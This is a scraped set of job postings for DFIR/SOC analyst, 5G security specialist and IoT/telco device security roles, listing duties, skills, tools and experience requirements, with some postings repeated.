DFIR/SOC Analyst · Expertise in Forensic Log Collection on Linux Machines · Proficient in acquiring system-level artifacts from Linux environments for digital forensic analysis. · Usage of Unix-like artifact collectors such as UAC (Unix Artifact Collector), Log2Timeline, Volatility, FTK, Encase, Eric Zimmerman's tools. · Development of Customized Scripts · Tailoring the default UAC script to fit specific incident response or investigation use cases including the Application logs. · Performance tuning to minimize system impact during live data acquisition. · Custom scripts for parsing and pattern based detection (Python, Bash, etc.) · Strong Understanding of Telecom Components · Familiarity with core telecom infrastructure such as: · Signaling systems (SS7, SIP, Diameter) · Network elements (MME, PGW, SGW, SIGTRAN, SPF, AMF, UPF, MSC, HLR, VLR, UDC, GTP etc.) · Bulk Analysis of Collected Artifacts · Triaging and prioritizing systems based on severity and presence of confirmed IOCs or TTPs. · Investigating a large number of systems in bulk using collected artifacts from Linux systems. · Leveraging automation and scripting (e.g., Python, Bash, YARA rules) to efficiently parse and analyze forensic data. · Identifying Indicators of Compromise (IOCs), suspicious behavior patterns, and anomaly detection. · Suspicious behavior patterns, including lateral movement, privilege escalation, and anomalous process execution. · Persistence mechanisms (e.g., rootkits, startup script modifications, backdoored binaries). · Timestamps for tampering or time-skewing to detect anti-forensic behavior. · Correlation of events across systems and timeframes to establish timelines and root causes. · Identification of Unauthorized Access, Unauthorized Configuration related changes, Malicious binaries, Persistence, Data Exfiltration, etc. · Support in post-incident activities such as RCA sessions or tabletop exercises. · Validation of Password reset activities. · Documentation and Reporting · Compilation of forensic findings into a structured and comprehensive report, including: • Executive summary • Technical findings with evidence • Timeline of events • Mapping the detections to MITRE TTPs • Recommendations for remediation and mitigation • Use case recommendation based on the TTPs. • Maintenance of internal documentation to support audit trails and reproducibility of analysis. · Interpersonal Skills · Ability to communicate complex technical findings effectively to both technical and non-technical audiences · Strong analytical and problem-solving skills, with attention to detail and accuracy · Self-driven and able to work effectively in high-stress situations, handling multiple incidents simultaneously · Demonstrated ability to work both independently and collaboratively within a team · Flexible in Shifts Show more Show less
Role Summary: The 5G Security Specialist will focus on securing 5G infrastructure by ensuring robust architectural designs, developing security controls, and monitoring for 5G-specific threats. The role also involves addressing unique security challenges posed by 5G technologies. Job Description: Design, implementation, and maintenance of security solutions for 5G networks. Designing a secure 5G network architecture that ensures the integrity of 5G infrastructure, including the RAN (Radio Access Network), Core Network, and Transport Network. Conducting risk assessments and vulnerability analyses for 5G infrastructure. Monitoring and responding to security incidents in real-time in 5G networks. Developing and enforcing security policies, standards, and procedures for 5G networks. Collaborating with cross-functional teams to ensure secure deployment of 5G technologies. Staying updated on the latest 5G security threats, trends, and mitigation strategies. Providing training and guidance to internal teams on 5G security best practices. Working with vendors and partners to ensure compliance with security standards. Preparing detailed reports and documentation on security assessments and incidents. Implementation of 5G security features like encryption and authentication protocols at the subscriber, application, and network layers. Implementation of security controls for network slicing, including ensuring secure isolation between slices for different services, and robust access control between 5G components. Deployment of 5G-specific intrusion detection/prevention systems (IDS/IPS) to monitor and detect threats in the 5G network, such as DDoS attacks, man-in-the-middle (MITM) attacks, and vulnerabilities in the RAN. Security assessments on 5G core elements to identify vulnerabilities in protocols like N2, N3, and N6 interfaces using penetration testing tools and custom scripts, and following industry standard as per GSMA/3GPP Development of 5G-specific incident response plans, including automated network quarantine and isolation procedures for compromised devices or services in the 5G network. Conduct 5G vulnerability assessments and risk mitigation plans. Show more Show less
DFIR/SOC Analyst · Expertise in Forensic Log Collection on Linux Machines · Proficient in acquiring system-level artifacts from Linux environments for digital forensic analysis. · Usage of Unix-like artifact collectors such as UAC (Unix Artifact Collector), Log2Timeline, Volatility, FTK, Encase, Eric Zimmerman's tools. · Development of Customized Scripts · Tailoring the default UAC script to fit specific incident response or investigation use cases including the Application logs. · Performance tuning to minimize system impact during live data acquisition. · Custom scripts for parsing and pattern based detection (Python, Bash, etc.) · Strong Understanding of Telecom Components · Familiarity with core telecom infrastructure such as: · Signaling systems (SS7, SIP, Diameter) · Network elements (MME, PGW, SGW, SIGTRAN, SPF, AMF, UPF, MSC, HLR, VLR, UDC, GTP etc.) · Bulk Analysis of Collected Artifacts · Triaging and prioritizing systems based on severity and presence of confirmed IOCs or TTPs. · Investigating a large number of systems in bulk using collected artifacts from Linux systems. · Leveraging automation and scripting (e.g., Python, Bash, YARA rules) to efficiently parse and analyze forensic data. · Identifying Indicators of Compromise (IOCs), suspicious behavior patterns, and anomaly detection. · Suspicious behavior patterns, including lateral movement, privilege escalation, and anomalous process execution. · Persistence mechanisms (e.g., rootkits, startup script modifications, backdoored binaries). · Timestamps for tampering or time-skewing to detect anti-forensic behavior. · Correlation of events across systems and timeframes to establish timelines and root causes. · Identification of Unauthorized Access, Unauthorized Configuration related changes, Malicious binaries, Persistence, Data Exfiltration, etc. · Support in post-incident activities such as RCA sessions or tabletop exercises. · Validation of Password reset activities. · Documentation and Reporting · Compilation of forensic findings into a structured and comprehensive report, including: • Executive summary • Technical findings with evidence • Timeline of events • Mapping the detections to MITRE TTPs • Recommendations for remediation and mitigation • Use case recommendation based on the TTPs. • Maintenance of internal documentation to support audit trails and reproducibility of analysis. · Interpersonal Skills · Ability to communicate complex technical findings effectively to both technical and non-technical audiences · Strong analytical and problem-solving skills, with attention to detail and accuracy · Self-driven and able to work effectively in high-stress situations, handling multiple incidents simultaneously · Demonstrated ability to work both independently and collaboratively within a team · Flexible in Shifts Show more Show less
Apply away if wiling to relocate KSA Devices & Telco Security (DTS) Team DTS Tower Lead / Consultant Purpose: Lead IoT and telco device security programs. Responsibilities: · Oversee security of network devices, base stations, IoT endpoints. · Ensure compliance with telecom security standards (3GPP, GSMA). Skills: Telco networks, IoT security, OT security. Experience: 8–10 years. Must Have: IoT/OT/Telco infra security, 10+ years exp, strategy & leadership. Good To Have: 5G & Edge security knowledge, telecom compliance. Tool: Palo Alto IoT, Forescout, Fortinet OT Security, Zscaler IoT. Comments: Ensures device and telco infra security framework. IoT / Devices Security Specialist Purpose: Implement and monitor device security controls. Responsibilities: · Harden IoT and telco devices. · Monitor endpoint security events. Skills: IoT protocols, MDM, EMM solutions. Experience: 3–5 years. Must Have: IoT protocols (MQTT, CoAP), endpoint device hardening. Good To Have: OT security, industrial control system exposure. Tool: Forescout, Trend Micro IoT Security, Fortinet. Comments: Focus on IoT endpoint & device protection. Senior IoT / Devices Security Specialist Purpose: Advanced threat detection and remediation for devices. Responsibilities: · Investigate device-specific attacks. · Implement firmware integrity checks. Skills: Embedded security, secure boot, threat modeling. Experience: 5–7 years. Must Have: 5+ years IoT/OT security, network segmentation, forensic experience. Good To Have: 5G security, MDM/EMM integration. Tool: Microsoft Intune, Forescout, Palo Alto IoT. Comments: Leads IoT/OT threat hunting, advanced config. IoT / Devices Security Consultant Purpose: Advise on IoT/telco device security strategy. Responsibilities: · Conduct device security assessments. · Recommend architecture improvements. Skills: IoT security frameworks, supply chain risk assessment. Experience: 8+ years. Must Have: Consulting, risk assessments for IoT/OT environments. Good To Have: Industry verticals (energy, healthcare, telco). Tool: OT/IoT assessment tools, Fortinet OT, Tenable.ot. Comments: Advisory-oriented role bridging business with tech.
Apply away if wiling to relocate KSA Devices & Telco Security (DTS) Team DTS Tower Lead / Consultant Purpose: Lead IoT and telco device security programs. Responsibilities: Oversee security of network devices, base stations, IoT endpoints. Ensure compliance with telecom security standards (3GPP, GSMA). Skills: Telco networks, IoT security, OT security. Experience: 810 years. Must Have: IoT/OT/Telco infra security, 10+ years exp, strategy & leadership. Good To Have: 5G & Edge security knowledge, telecom compliance. Tool: Palo Alto IoT, Forescout, Fortinet OT Security, Zscaler IoT. Comments: Ensures device and telco infra security framework. IoT / Devices Security Specialist Purpose: Implement and monitor device security controls. Responsibilities: Harden IoT and telco devices. Monitor endpoint security events. Skills: IoT protocols, MDM, EMM solutions. Experience: 35 years. Must Have: IoT protocols (MQTT, CoAP), endpoint device hardening. Good To Have: OT security, industrial control system exposure. Tool: Forescout, Trend Micro IoT Security, Fortinet. Comments: Focus on IoT endpoint & device protection. Senior IoT / Devices Security Specialist Purpose: Advanced threat detection and remediation for devices. Responsibilities: Investigate device-specific attacks. Implement firmware integrity checks. Skills: Embedded security, secure boot, threat modeling. Experience: 57 years. Must Have: 5+ years IoT/OT security, network segmentation, forensic experience. Good To Have: 5G security, MDM/EMM integration. Tool: Microsoft Intune, Forescout, Palo Alto IoT. Comments: Leads IoT/OT threat hunting, advanced config. IoT / Devices Security Consultant Purpose: Advise on IoT/telco device security strategy. Responsibilities: Conduct device security assessments. Recommend architecture improvements. Skills: IoT security frameworks, supply chain risk assessment. Experience: 8+ years. Must Have: Consulting, risk assessments for IoT/OT environments. Good To Have: Industry verticals (energy, healthcare, telco). Tool: OT/IoT assessment tools, Fortinet OT, Tenable.ot. Comments: Advisory-oriented role bridging business with tech. Show more Show less
As a 5G Security Specialist, your primary focus will be on ensuring the security of 5G infrastructure through robust architectural designs, security control development, and monitoring for 5G-specific threats. You will be tasked with addressing the unique security challenges that arise from 5G technologies. Your responsibilities will include designing, implementing, and maintaining security solutions tailored for 5G networks. This will involve creating a secure network architecture that guarantees the integrity of 5G infrastructure components such as the RAN, Core Network, and Transport Network. You will conduct risk assessments and vulnerability analyses specific to 5G infrastructure, as well as monitor and respond to security incidents in real-time within 5G networks. Collaboration with cross-functional teams will be essential to ensure the secure deployment of 5G technologies. Staying informed about the latest 5G security threats, trends, and mitigation strategies will also be crucial. Additionally, you will need to provide training and guidance to internal teams on best practices for 5G security. Working closely with vendors and partners, you will ensure compliance with security standards and prepare detailed reports and documentation on security assessments and incidents. Implementation of encryption and authentication protocols at various network layers, security controls for network slicing, and intrusion detection/prevention systems for 5G-specific threats like DDoS attacks and MITM attacks will be part of your responsibilities. Conducting security assessments on 5G core elements, developing incident response plans, and performing vulnerability assessments and risk mitigation plans are also key aspects of this role. Your expertise will be crucial in maintaining the security and integrity of 5G networks in the face of evolving security threats and challenges.,